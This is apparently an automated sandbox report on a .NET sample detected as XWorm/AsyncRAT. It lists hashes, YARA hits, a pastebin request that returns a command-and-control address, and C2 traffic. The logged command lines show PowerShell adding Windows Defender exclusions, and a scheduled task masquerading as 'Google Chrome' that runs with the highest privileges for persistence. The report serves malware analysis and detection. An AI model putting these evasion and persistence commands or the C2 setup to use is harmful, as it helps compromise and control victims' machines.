3b5074b1b5d032e5620f69f9f700ff0e | Purchase Order.exe | malicious | AgentTesla | 104.20.4.235
3b5074b1b5d032e5620f69f9f700ff0e | vb.vbs | malicious | AsyncRAT, PureLog Stealer | 104.20.4.235
                                                  No context
                                                  Process:C:\Users\user\Desktop\ra66DSpa.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):78848
                                                  Entropy (8bit):6.017233981963163
                                                  Encrypted:false
                                                  SSDEEP:1536:SId+Mwkxo+YjhKfK3qmVc0i+bLEf/Hk8q+OiY86dyCMpKpOBdGqkgQGM:SKX8KqqmVcb+bL6/VFPoy5KpOBbM
                                                  MD5:12AC7EECCA99175C8953B8368D96440E
                                                  SHA1:AA6FCF14C66644111D1160A6DD4CDB67C58E709A
                                                  SHA-256:9D7A88AA72820977134B39B0AE1907FD738DE184B89CE72FBB77CEE530A10E49
                                                  SHA-512:5D5F775B32182C6AAB302462A2B8E9A2D608F232DF2DC02C3826405E4A3A46EF040E8249FEAF2133DEE3ED3F111AEB4E884FDB4EDAE743DBC6E255C40EB51C9E
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Google Chrome.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Google Chrome.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..f.................(..........>F... ...`....@.. ....................................@..................................E..S....`............................................................................... ............... ..H............text...D&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc...............2..............@..B................ F......H........^..T.......&.....................................................(....*.r...p*. .(T.*..(....*.r/..p*. ....*.s.........s.........s.........s.........*.r]..p*. ~.H.*.r...p*. ..e.*.r...p*.r...p*. E/..*.r...p*. ....*..((...*.rX..p*.r...p*. .x!.*"(....+.*&(....&+.*.+5sY... .... .'..oZ...(,...~....-.(J...(<...~....o[...&.-.*.r...p*. .;..*.r ..p*. .-.*.rN..p*. ...*.r|..p*. .8F.*.r...p*. .b^.*.r...p*. ....*.r...p*. q.Z.*..............j..................s\..............~...
                                                  Process:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................
                                                  Process:C:\Users\user\Desktop\ra66DSpa.exe
                                                  File Type:Generic INItialization configuration [WIN]
                                                  Category:dropped
                                                  Size (bytes):58
                                                  Entropy (8bit):3.598349098128234
                                                  Encrypted:false
                                                  SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                  MD5:5362ACB758D5B0134C33D457FCC002D9
                                                  SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                  SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                  SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                  Malicious:false
                                                  Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):6.017233981963163
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:ra66DSpa.exe
                                                  File size:78'848 bytes
                                                  MD5:12ac7eecca99175c8953b8368d96440e
                                                  SHA1:aa6fcf14c66644111d1160a6dd4cdb67c58e709a
                                                  SHA256:9d7a88aa72820977134b39b0ae1907fd738de184b89ce72fbb77cee530a10e49
                                                  SHA512:5d5f775b32182c6aab302462a2b8e9a2d608f232df2dc02c3826405e4a3a46ef040e8249feaf2133dee3ed3f111aeb4e884fdb4edae743dbc6e255c40eb51c9e
                                                  SSDEEP:1536:SId+Mwkxo+YjhKfK3qmVc0i+bLEf/Hk8q+OiY86dyCMpKpOBdGqkgQGM:SKX8KqqmVcb+bL6/VFPoy5KpOBbM
                                                  TLSH:24738D587BE54429F1BFAFB46DF16246D678F7231813C26F28C5018A0A33E89C9507FA
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..f.................(..........>F... ...`....@.. ....................................@................................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x41463e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66F7F22C [Sat Sep 28 12:10:20 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                   Name | Virtual Address | Virtual Size | Is in Section
                                                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0x145e8 | 0x53 | .text
                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x602 | .rsrc
                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18000 | 0xc | .reloc
                                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                   .text | 0x2000 | 0x12644 | 0x12800 | 4049029aa633b14110a94893a2bfd617 | False | 0.6175834037162162 | data | 6.10285081370132 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                   .rsrc | 0x16000 | 0x602 | 0x800 | 500e9eb3093d4c68302b49f6751ecc82 | False | 0.32861328125 | data | 3.4723828207295924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                   .reloc | 0x18000 | 0xc | 0x200 | 23c92956a7e4071d4829a441b0077b53 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                   RT_VERSION | 0x160a0 | 0x378 | data | | | 0.42004504504504503
                                                   RT_MANIFEST | 0x16418 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                   DLL | Import
                                                   mscoree.dll | _CorExeMain
                                                   Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                   2024-10-04T01:48:03.617687+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 53844 | 147.185.221.21 | 42956 | TCP
                                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                   Oct 4, 2024 01:47:50.521373987 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:50.521473885 CEST | 443 | 53843 | 104.20.4.235 | 192.168.2.6
                                                   Oct 4, 2024 01:47:50.521780968 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:50.532305956 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:50.532341957 CEST | 443 | 53843 | 104.20.4.235 | 192.168.2.6
                                                   Oct 4, 2024 01:47:51.003957033 CEST | 443 | 53843 | 104.20.4.235 | 192.168.2.6
                                                   Oct 4, 2024 01:47:51.004062891 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:51.012216091 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:51.012259960 CEST | 443 | 53843 | 104.20.4.235 | 192.168.2.6
                                                   Oct 4, 2024 01:47:51.012631893 CEST | 443 | 53843 | 104.20.4.235 | 192.168.2.6
                                                   Oct 4, 2024 01:47:51.067183018 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:51.074868917 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:51.115448952 CEST | 443 | 53843 | 104.20.4.235 | 192.168.2.6
                                                   Oct 4, 2024 01:47:52.743880987 CEST | 443 | 53843 | 104.20.4.235 | 192.168.2.6
                                                   Oct 4, 2024 01:47:52.743999004 CEST | 443 | 53843 | 104.20.4.235 | 192.168.2.6
                                                   Oct 4, 2024 01:47:52.744158983 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:52.757507086 CEST | 53843 | 443 | 192.168.2.6 | 104.20.4.235
                                                   Oct 4, 2024 01:47:52.899888039 CEST | 53844 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:47:52.904766083 CEST | 42956 | 53844 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:47:52.904865980 CEST | 53844 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:47:53.041532040 CEST | 53844 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:47:53.046658039 CEST | 42956 | 53844 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:03.617686987 CEST | 53844 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:03.622833014 CEST | 42956 | 53844 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:14.192465067 CEST | 53844 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:14.197442055 CEST | 42956 | 53844 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:14.282731056 CEST | 42956 | 53844 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:14.282896042 CEST | 53844 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:14.348550081 CEST | 53844 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:14.349926949 CEST | 53845 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:14.353404999 CEST | 42956 | 53844 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:14.355096102 CEST | 42956 | 53845 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:14.355454922 CEST | 53845 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:14.384497881 CEST | 53845 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:14.389254093 CEST | 42956 | 53845 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:28.676569939 CEST | 53845 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:28.681560993 CEST | 42956 | 53845 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:35.800874949 CEST | 42956 | 53845 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:35.800937891 CEST | 53845 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:35.927014112 CEST | 53845 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:35.928304911 CEST | 53846 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:35.931896925 CEST | 42956 | 53845 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:35.933423042 CEST | 42956 | 53846 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:35.937217951 CEST | 53846 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:35.973851919 CEST | 53846 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:35.978732109 CEST | 42956 | 53846 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:46.739145041 CEST | 53846 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Oct 4, 2024 01:48:46.853003025 CEST | 42956 | 53846 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:57.316607952 CEST | 42956 | 53846 | 147.185.221.21 | 192.168.2.6
                                                   Oct 4, 2024 01:48:57.316692114 CEST | 53846 | 42956 | 192.168.2.6 | 147.185.221.21
                                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                   Oct 4, 2024 01:47:39.918234110 CEST | 53 | 60142 | 162.159.36.2 | 192.168.2.6
                                                   Oct 4, 2024 01:47:41.382519960 CEST | 53 | 53140 | 1.1.1.1 | 192.168.2.6
                                                   Oct 4, 2024 01:47:50.507186890 CEST | 61440 | 53 | 192.168.2.6 | 1.1.1.1
                                                   Oct 4, 2024 01:47:50.514502048 CEST | 53 | 61440 | 1.1.1.1 | 192.168.2.6
                                                   Oct 4, 2024 01:47:52.886837959 CEST | 52877 | 53 | 192.168.2.6 | 1.1.1.1
                                                   Oct 4, 2024 01:47:52.898610115 CEST | 53 | 52877 | 1.1.1.1 | 192.168.2.6
                                                   Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                   Oct 4, 2024 01:47:50.507186890 CEST | 192.168.2.6 | 1.1.1.1 | 0xadca | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
                                                   Oct 4, 2024 01:47:52.886837959 CEST | 192.168.2.6 | 1.1.1.1 | 0x3841 | Standard query (0) | stay-brook.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
                                                   Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                   Oct 4, 2024 01:47:50.514502048 CEST | 1.1.1.1 | 192.168.2.6 | 0xadca | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
                                                   Oct 4, 2024 01:47:50.514502048 CEST | 1.1.1.1 | 192.168.2.6 | 0xadca | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
                                                   Oct 4, 2024 01:47:50.514502048 CEST | 1.1.1.1 | 192.168.2.6 | 0xadca | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
                                                   Oct 4, 2024 01:47:52.898610115 CEST | 1.1.1.1 | 192.168.2.6 | 0x3841 | No error (0) | stay-brook.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false
                                                  • pastebin.com
                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                   0 | 192.168.2.6 | 53843 | 104.20.4.235 | 443 | 4540 | C:\Users\user\Desktop\ra66DSpa.exe
                                                   Timestamp | Bytes transferred | Direction | Data
                                                   2024-10-03 23:47:51 UTC | 74 | OUT | GET /raw/hhG5zGXd HTTP/1.1
                                                   Host: pastebin.com
                                                   Connection: Keep-Alive
                                                   2024-10-03 23:47:52 UTC | 388 | IN | HTTP/1.1 200 OK
                                                   Date: Thu, 03 Oct 2024 23:47:52 GMT
                                                   Content-Type: text/plain; charset=utf-8
                                                   Transfer-Encoding: chunked
                                                   Connection: close
                                                   x-frame-options: DENY
                                                   x-content-type-options: nosniff
                                                   x-xss-protection: 1;mode=block
                                                   cache-control: public, max-age=1801
                                                   CF-Cache-Status: MISS
                                                   Last-Modified: Thu, 03 Oct 2024 23:47:52 GMT
                                                   Server: cloudflare
                                                   CF-RAY: 8cd0d1d48e2242b7-EWR
                                                   2024-10-03 23:47:52 UTC | 35 | IN | Data Raw: 31 64 0d 0a 73 74 61 79 2d 62 72 6f 6f 6b 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 34 32 39 35 36 0d 0a
                                                   Data Ascii: 1d stay-brook.gl.at.ply.gg:42956
                                                   2024-10-03 23:47:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                   Data Ascii: 0



                                                  Target ID:0
                                                  Start time:19:46:53
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\Desktop\ra66DSpa.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\ra66DSpa.exe"
                                                  Imagebase:0x6b0000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:19:46:56
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe'
                                                  Imagebase:0x7ff6e3d50000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:19:46:56
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:19:47:03
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe'
                                                  Imagebase:0x7ff6e3d50000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:19:47:03
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:19:47:13
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe'
                                                  Imagebase:0x7ff6e3d50000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:19:47:13
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:19:47:27
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                                                  Imagebase:0x7ff6e3d50000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:19:47:27
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:19:47:49
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0x7ff727c20000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:19:47:49
                                                  Start date:03/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:19:47:50
                                                  Start date:03/10/2024
                                                  Path:C:\Users\user\AppData\Local\Google Chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Google Chrome.exe"
                                                  Imagebase:0xa60000
                                                  File size:78'848 bytes
                                                  MD5 hash:12AC7EECCA99175C8953B8368D96440E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Google Chrome.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Google Chrome.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
